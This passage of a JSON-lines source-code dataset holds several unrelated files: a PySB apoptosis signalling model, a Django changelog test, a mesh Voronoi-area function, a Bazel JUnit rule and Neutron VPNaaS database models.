ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)\nRule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None, Bcl2=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)\nRule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None, Bcl2=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1, Bcl2=None) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)\nRule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1, Bcl2=None) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None, Bcl2=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)\nRule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)\nRule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)\nRule('inhibition_0_Bcl2_inhibitor_BidM_inh_target', Bcl2(BidM=None, BaxA=None) + BidM(BaxM=None, Bcl2=None) | Bcl2(BidM=1, BaxA=None) % BidM(BaxM=None, Bcl2=1), inhibition_0_Bcl2_inhibitor_BidM_inh_target_2kf, inhibition_0_Bcl2_inhibitor_BidM_inh_target_1kr)\nRule('inhibition_0_Bcl2_inhibitor_BaxA_inh_target', Bcl2(BidM=None, BaxA=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | Bcl2(BidM=None, BaxA=1) % BaxA(BaxM=None, Bcl2=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), inhibition_0_Bcl2_inhibitor_BaxA_inh_target_2kf, inhibition_0_Bcl2_inhibitor_BaxA_inh_target_1kr)\nRule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)\nRule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)\nRule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)\nRule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5) >> BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacC(Xiap=None), transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)\nRule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, Bcl2=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, Bcl2=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)\nRule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(Apop=None, C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1) >> C8A(BidU=None, C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)\nRule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)\nRule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)\nRule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)\n\nInitial(Ligand(Receptor=None), Ligand_0)\nInitial(ParpU(C3A=None), ParpU_0)\nInitial(C8A(BidU=None, C3pro=None), C8A_0)\nInitial(SmacM(BaxA=None), SmacM_0)\nInitial(BaxM(BidM=None, BaxA=None), BaxM_0)\nInitial(Apop(C3pro=None, Xiap=None), Apop_0)\nInitial(Fadd(Receptor=None, C8pro=None), Fadd_0)\nInitial(SmacC(Xiap=None), SmacC_0)\nInitial(ParpC(), ParpC_0)\nInitial(Xiap(SmacC=None, Apop=None, C3A=None), Xiap_0)\nInitial(C9(), C9_0)\nInitial(C3ub(), C3ub_0)\nInitial(C8pro(Fadd=None, C6A=None), C8pro_0)\nInitial(Bcl2(BidM=None, BaxA=None), Bcl2_0)\nInitial(C3pro(Apop=None, C8A=None), C3pro_0)\nInitial(CytoCM(BaxA=None), CytoCM_0)\nInitial(CytoCC(), CytoCC_0)\nInitial(BaxA(BaxM=None, Bcl2=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), BaxA_0)\nInitial(ApafI(), ApafI_0)\nInitial(BidU(C8A=None), BidU_0)\nInitial(BidT(), BidT_0)\nInitial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)\nInitial(ApafA(), ApafA_0)\nInitial(BidM(BaxM=None, Bcl2=None), BidM_0)\nInitial(Receptor(Ligand=None, Fadd=None), Receptor_0)\nInitial(C6A(C8pro=None), C6A_0)\nInitial(C6pro(C3A=None), C6pro_0)\n\n"} {"ext": "py", "sha": "1a309786af1c9973f12338e6c2279a5915624c25", "content": "from unittest import TestCase\nfrom unittest.mock import patch\nfrom pathlib import Path\nfrom click.testing import CliRunner\n\nfrom ..management.commands import bump_changelog\nfrom hourglass import changelog\nfrom hourglass.tests.test_changelog import UtilTests\n\n\ndef patch_new_version(version):\n return patch.object(bump_changelog, '__version__', version)\n\n\ndef patch_changelog_contents(contents):\n return patch.object(changelog, 'get_contents', lambda: contents)\n\n\nclass BumpChangelogTests(TestCase):\n @patch_new_version('9.0.0')\n @patch_changelog_contents(UtilTests.AFTER_BUMP)\n def test_it_reports_error_on_no_release_notes(self):\n result = CliRunner().invoke(bump_changelog.command)\n self.assertIn('The new release has no release notes', result.output)\n self.assertNotEqual(result.exit_code, 0)\n\n @patch_new_version('0.0.1')\n @patch_changelog_contents(UtilTests.BEFORE_BUMP)\n def test_it_reports_error_if_new_version_is_invalid(self):\n result = CliRunner().invoke(bump_changelog.command)\n self.assertIn('Please change hourglass/version.py', result.output)\n self.assertNotEqual(result.exit_code, 0)\n\n @patch_new_version('9.0.0')\n @patch_changelog_contents(UtilTests.BEFORE_BUMP)\n def test_it_works(self):\n runner = CliRunner()\n\n with runner.isolated_filesystem():\n fakelog = Path('fake-changelog.md')\n with patch.object(changelog, 'PATH', fakelog):\n result = CliRunner().invoke(bump_changelog.command)\n\n self.assertIn('Modifying CHANGELOG.md', result.output)\n self.assertEqual(result.exit_code, 0)\n\n with fakelog.open('r', encoding=changelog.ENCODING) as f:\n self.assertIn('9.0.0', f.read())\n\n tagmsg = Path('tag-message-v9.0.0.txt')\n\n with tagmsg.open('r', encoding=changelog.ENCODING) as f:\n self.assertIn('Fixed some stuff', f.read())\n\n\ndel UtilTests # So our test runner doesn't find and run them.\n"} {"ext": "py", "sha": "1a30982239f4de85dd80e93c26b92eca80e36f08", "content": "import numpy as np\n\n\ndef vertex_voronoi(mesh):\n \"\"\"\n compute vertex voronoi of a mesh as described in\n Meyer, M., Desbrun, M., Schroder, P., Barr, A. (2002).\n Discrete differential geometry operators for triangulated 2manifolds.\n Visualization and Mathematics, 1..26.\n :param mesh: trimesh object\n :return: numpy array of shape (mesh.vertices.shape[0],)\n \"\"\"\n Nbv = mesh.vertices.shape[0]\n Nbp = mesh.faces.shape[0]\n obt_angs = mesh.face_angles > np.pi / 2\n obt_poly = obt_angs[:, 0] | obt_angs[:, 1] | obt_angs[:, 2]\n print(' -percent polygon with obtuse angle ',\n 100.0 * len(np.where(obt_poly)[0]) / Nbp)\n cot = 1 / np.tan(mesh.face_angles)\n vert_voronoi = np.zeros(Nbv)\n for ind_p, p in enumerate(mesh.faces):\n if obt_poly[ind_p]:\n obt_verts = p[obt_angs[ind_p, :]]\n vert_voronoi[obt_verts] = vert_voronoi[obt_verts] + \\\n mesh.area_faces[ind_p] / 2.0\n non_obt_verts = p[[not x for x in obt_angs[ind_p, :]]]\n vert_voronoi[non_obt_verts] = vert_voronoi[non_obt_verts] + \\\n mesh.area_faces[ind_p] / 4.0\n else:\n d0 = np.sum(\n np.power(mesh.vertices[p[1], :] - mesh.vertices[p[2], :], 2))\n d1 = np.sum(\n np.power(mesh.vertices[p[2], :] - mesh.vertices[p[0], :], 2))\n d2 = np.sum(\n np.power(mesh.vertices[p[0], :] - mesh.vertices[p[1], :], 2))\n vert_voronoi[p[0]] = vert_voronoi[p[0]] + \\\n (d1 * cot[ind_p, 1] + d2 * cot[ind_p, 2]) / 8.0\n vert_voronoi[p[1]] = vert_voronoi[p[1]] + \\\n (d2 * cot[ind_p, 2] + d0 * cot[ind_p, 0]) / 8.0\n vert_voronoi[p[2]] = vert_voronoi[p[2]] + \\\n (d0 * cot[ind_p, 0] + d1 * cot[ind_p, 1]) / 8.0\n\n return vert_voronoi\n"} {"ext": "bzl", "sha": "1a3099728db5d040b873b478c2de06aba0688d07", "content": "# Copyright (C) 2016 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Skylark rule to generate a Junit4 TestSuite\n# Assumes srcs are all .java Test files\n# Assumes junit4 is already added to deps by the user.\n\n# See https://github.com/bazelbuild/bazel/issues/1017 for background.\n\n_OUTPUT = \"\"\"import org.junit.runners.Suite;\nimport org.junit.runner.RunWith;\n\n@RunWith(Suite.class)\n@Suite.SuiteClasses({%s})\npublic class %s {}\n\"\"\"\n\n_PREFIXES = (\"org\", \"com\", \"edu\")\n\ndef _SafeIndex(j, val):\n for i, v in enumerate(j):\n if val == v:\n return i\n return -1\n\ndef _AsClassName(fname):\n fname = [x.path for x in fname.files.to_list()][0]\n toks = fname[:-5].split(\"/\")\n findex = -1\n for s in _PREFIXES:\n findex = _SafeIndex(toks, s)\n if findex != -1:\n break\n if findex == -1:\n fail(\"%s does not contain any of %s\" % (fname, _PREFIXES))\n return \".\".join(toks[findex:]) + \".class\"\n\ndef _impl(ctx):\n classes = \",\".join(\n [_AsClassName(x) for x in ctx.attr.srcs],\n )\n ctx.actions.write(output = ctx.outputs.out, content = _OUTPUT % (\n classes,\n ctx.attr.outname,\n ))\n\n_GenSuite = rule(\n attrs = {\n \"srcs\": attr.label_list(allow_files = True),\n \"outname\": attr.string(),\n },\n outputs = {\"out\": \"%{name}.java\"},\n implementation = _impl,\n)\n\nPOST_JDK8_OPTS = [\n # Enforce JDK 8 compatibility on Java 9, see\n # https://docs.oracle.com/javase/9/intl/internationalization-enhancements-jdk-9.htm#JSINT-GUID-AF5AECA7-07C1-4E7D-BC10-BC7E73DC6C7F\n \"-Djava.locale.providers=COMPAT,CLDR,SPI\",\n \"--add-opens=jdk.management/com.sun.management.internal=ALL-UNNAMED\",\n]\n\ndef junit_tests(name, srcs, **kwargs):\n s_name = name.replace(\"-\", \"_\") + \"TestSuite\"\n _GenSuite(\n name = s_name,\n srcs = srcs,\n outname = s_name,\n )\n jvm_flags = kwargs.get(\"jvm_flags\", [])\n jvm_flags = jvm_flags + select({\n \"//:java9\": POST_JDK8_OPTS,\n \"//:java_next\": POST_JDK8_OPTS,\n \"//conditions:default\": [],\n })\n native.java_test(\n name = name,\n test_class = s_name,\n srcs = srcs + [\":\" + s_name],\n **dict(kwargs, jvm_flags = jvm_flags)\n )\n"} {"ext": "py", "sha": "1a309a51d2ac17f98e6c30813c0f63ef4cabd740", "content": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# @author: Swaminathan Vasudevan, Hewlett-Packard.\n\nimport sqlalchemy as sa\nfrom sqlalchemy import orm\nfrom sqlalchemy.orm import exc\n\nfrom neutron.common import constants as q_constants\nfrom neutron.db import agentschedulers_db as agent_db\nfrom neutron.db import api as qdbapi\nfrom neutron.db import db_base_plugin_v2 as base_db\nfrom neutron.db import l3_db\nfrom neutron.db import model_base\nfrom neutron.db import models_v2\nfrom neutron.extensions import vpnaas\nfrom neutron.extensions.vpnaas import VPNPluginBase\nfrom neutron import manager\nfrom neutron.openstack.common import log as logging\nfrom neutron.openstack.common import uuidutils\nfrom neutron.plugins.common import constants\n\nLOG = logging.getLogger(__name__)\n\n\nclass IPsecPeerCidr(model_base.BASEV2):\n \"\"\"Internal representation of a IPsec Peer Cidrs.\"\"\"\n\n cidr = sa.Column(sa.String(32), nullable=False, primary_key=True)\n ipsec_site_connection_id = sa.Column(\n sa.String(36),\n sa.ForeignKey('ipsec_site_connections.id',\n ondelete=\"CASCADE\"),\n primary_key=True)\n\n\nclass IPsecPolicy(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a v2 IPsecPolicy Object.\"\"\"\n __tablename__ = 'ipsecpolicies'\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n transform_protocol = sa.Column(sa.Enum(\"esp\", \"ah\", \"ah-esp\",\n name=\"ipsec_transform_protocols\"),\n nullable=False)\n auth_algorithm = sa.Column(sa.Enum(\"sha1\",\n name=\"vpn_auth_algorithms\"),\n nullable=False)\n encryption_algorithm = sa.Column(sa.Enum(\"3des\", \"aes-128\",\n \"aes-256\", \"aes-192\",\n name=\"vpn_encrypt_algorithms\"),\n nullable=False)\n encapsulation_mode = sa.Column(sa.Enum(\"tunnel\", \"transport\",\n name=\"ipsec_encapsulations\"),\n nullable=False)\n lifetime_units = sa.Column(sa.Enum(\"seconds\", \"kilobytes\",\n name=\"vpn_lifetime_units\"),\n nullable=False)\n lifetime_value = sa.Column(sa.Integer, nullable=False)\n pfs = sa.Column(sa.Enum(\"group2\", \"group5\", \"group14\",\n name=\"vpn_pfs\"), nullable=False)\n\n\nclass IKEPolicy(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a v2 IKEPolicy Object.\"\"\"\n __tablename__ = 'ikepolicies'\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n auth_algorithm = sa.Column(sa.Enum(\"sha1\",\n name=\"vpn_auth_algorithms\"),\n nullable=False)\n encryption_algorithm = sa.Column(sa.Enum(\"3des\", \"aes-128\",\n \"aes-256\", \"aes-192\",\n name=\"vpn_encrypt_algorithms\"),\n nullable=False)\n phase1_negotiation_mode = sa.Column(sa.Enum(\"main\",\n name=\"ike_phase1_mode\"),\n nullable=False)\n lifetime_units = sa.Column(sa.Enum(\"seconds\", \"kilobytes\",\n name=\"vpn_lifetime_units\"),\n nullable=False)\n lifetime_value = sa.Column(sa.Integer, nullable=False)\n ike_version = sa.Column(sa.Enum(\"v1\", \"v2\", name=\"ike_versions\"),\n nullable=False)\n pfs = sa.Column(sa.Enum(\"group2\", \"group5\", \"group14\",\n name=\"vpn_pfs\"), nullable=False)\n\n\nclass IPsecSiteConnection(model_base.BASEV2,\n models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a IPsecSiteConnection Object.\"\"\"\n __tablename__ = 'ipsec_site_connections'\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n peer_address = sa.Column(sa.String(64), nullable=False)\n peer_id = sa.Column(sa.String(255), nullable=False)\n route_mode = sa.Column(sa.String(8), nullable=False)\n mtu = sa.Column(sa.Integer, nullable=False)\n initiator = sa.Column(sa.Enum(\"bi-directional\", \"response-only\",\n name=\"vpn_initiators\"), nullable=False)\n auth_mode = sa.Column(sa.String(16), nullable=False)\n psk = sa.Column(sa.String(255), nullable=False)\n dpd_action = sa.Column(sa.Enum(\"hold\", \"clear\",\n \"restart\", \"disabled\",\n \"restart-by-peer\", name=\"vpn_dpd_actions\"),\n nullable=False)\n dpd_interval = sa.Column(sa.Integer, nullable=False)\n dpd_timeout = sa.Column(sa.Integer, nullable=False)\n status = sa.Column(sa.String(16), nullable=False)\n admin_state_up = sa.Column(sa.Boolean(), nullable=False)\n vpnservice_id = sa.Column(sa.String(36),\n sa.ForeignKey('vpnservices.id'),\n nullable=False)\n ipsecpolicy_id = sa.Column(sa.String(36),\n sa.ForeignKey('ipsecpolicies.id'),\n nullable=False)\n ikepolicy_id = sa.Column(sa.String(36),\n sa.ForeignKey('ikepolicies.id'),\n nullable=False)\n ipsecpolicy = orm.relationship(\n IPsecPolicy, backref='ipsec_site_connection')\n ikepolicy = orm.relationship(IKEPolicy, backref='ipsec_site_connection')\n peer_cidrs = orm.relationship(IPsecPeerCidr,\n backref='ipsec_site_connection',\n lazy='joined',\n cascade='all, delete, delete-orphan')\n\n\nclass VPNService(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):\n \"\"\"Represents a v2 VPNService Object.\"\"\"\n name = sa.Column(sa.String(255))\n description = sa.Column(sa.String(255))\n status = sa.Column(sa.String(16), nullable=False)\n admin_state_up = sa.Column(sa.Boolean(), nullable=False)\n subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),\n nullable=False)\n router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'),\n nullable=False)\n subnet = orm.relationship(models_v2.Subnet)\n router = orm.relationship(l3_db.Router)\n ipsec_site_connections = orm.relationship(\n IPsecSiteConnection,\n backref='vpnservice',\n cascade=\"all, delete-orphan\")\n\n\nclass VPNPluginDb(VPNPluginBase, base_db.CommonDbMixin):\n \"\"\"VPN plugin database class using SQLAlchemy models.\"\"\"\n\n def __init__(self):\n \"\"\"Do the initialization for the vpn service plugin here.\"\"\"\n qdbapi.register_models()\n\n def update_status(self, context, model, v_id, status):\n with context.session.begin(subtransactions=True):\n v_db = self._get_resource(context, model, v_id)\n v_db.update({'status': status})\n\n def _get_resource(self, context, model, v_id):\n try:\n r = self._get_by_id(context, model, v_id)\n except exc.NoResultFound:\n if issubclass(model, IPsecSiteConnection):\n raise vpnaas.IPsecSiteConnectionNotFound(\n ipsec_site_conn_id=v_id\n )\n elif issubclass(model, IKEPolicy):\n raise vpnaas.IKEPolicyNotFound(ikepolicy_id=v_id)\n elif issubclass(model, IPsecPolicy):\n raise vpnaas.IPsecPolicyNotFound(ipsecpolicy_id=v_id)\n elif issubclass(model, VPNService):\n raise vpnaas.VPNServiceNotFound(vpnservice_id=v_id)\n else:\n raise\n return r\n\n def assert_update_allowed(self, obj):\n status = getattr(obj, 'status', None)\n if status != constants.ACTIVE:\n raise vpnaas.VPNStateInvalid(id=id, state=status)\n\n def _make_ipsec_site_connection_dict(self, ipsec_site_conn, fields=None):\n\n res = {'id': ipsec_site_conn['id'],\n 'tenant_id': ipsec_site_conn['tenant_id'],\n 'name': ipsec_site_conn['name'],\n 'description': ipsec_site_conn['description'],\n 'peer_address': ipsec_site_conn['peer_address'],\n 'peer_id': ipsec_site_conn['peer_id'],\n 'route_mode': ipsec_site_conn['route_mode'],\n 'mtu': ipsec_site_conn['mtu'],\n 'auth_mode': ipsec_site_conn['auth_mode'],\n 'psk': ipsec_site_conn['psk'],\n 'initiator': ipsec_site_conn['initiator'],\n 'dpd': {\n 'action': ipsec_site_conn['dpd_action'],\n 'interval': ipsec_site_conn['dpd_interval'],\n 'timeout': ipsec_site_conn['dpd_timeout']\n },\n 'admin_state_up': ipsec_site_conn['admin_state_up'],\n 'status': ipsec_site_conn['status'],\n 'vpnservice_id': ipsec_site_conn['vpnservice_id'],\n 'ikepolicy_id': ipsec_site_conn['ikepolicy_id'],\n 'ipsecpolicy_id': ipsec_site_conn['ipsecpolicy_id'],\n 'peer_cidrs': [pcidr['cidr']\n for pcidr in ipsec_site_conn['peer_cidrs']]\n }\n\n return self._fields(res, fields)\n\n def create_ipsec_site_connection(self, context, ipsec_site_connection):\n ipsec_sitecon = ipsec_site_connection['ipsec_site_connection']\n dpd = ipsec_sitecon['dpd']\n ipsec_sitecon['dpd_action'] = dpd.get('action', 'hold')\n ipsec_sitecon['dpd_interval'] = dpd.get('interval', 30)\n ipsec_sitecon['dpd_timeout'] = dpd.get('timeout', 120)\n tenant_id = self._get_tenant_id_for_create(context, ipsec_sitecon)\n if ipsec_sitecon['dpd_timeout'] < ipsec_sitecon['dpd_interval']:\n raise vpnaas.IPsecSiteConnectionDpdIntervalValueError(\n attribute_a='dpd_timeout')\n with context.session.begin(subtransactions=True):\n #Check permissions\n self._get_resource(context,\n VPNService,\n ipsec_sitecon['vpnservice_id'])\n self._get_resource(context,\n IKEPolicy,\n ipsec_sitecon['ikepolicy_id'])\n self._get_resource(context,\n IPsecPolicy,\n ipsec_sitecon['ipsecpolicy_id'])\n ipsec_site_conn_db = IPsecSiteConnection(\n id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=ipsec_sitecon['name'],\n description=ipsec_sitecon['description'],\n peer_address=ipsec_sitecon['peer_address'],\n peer_id=ipsec_sitecon['peer_id'],\n route_mode='static',\n mtu=ipsec_sitecon['mtu'],\n auth_mode='psk',\n psk=ipsec_sitecon['psk'],\n initiator=ipsec_sitecon['initiator'],\n dpd_action=ipsec_sitecon['dpd_action'],\n dpd_interval=ipsec_sitecon['dpd_interval'],\n 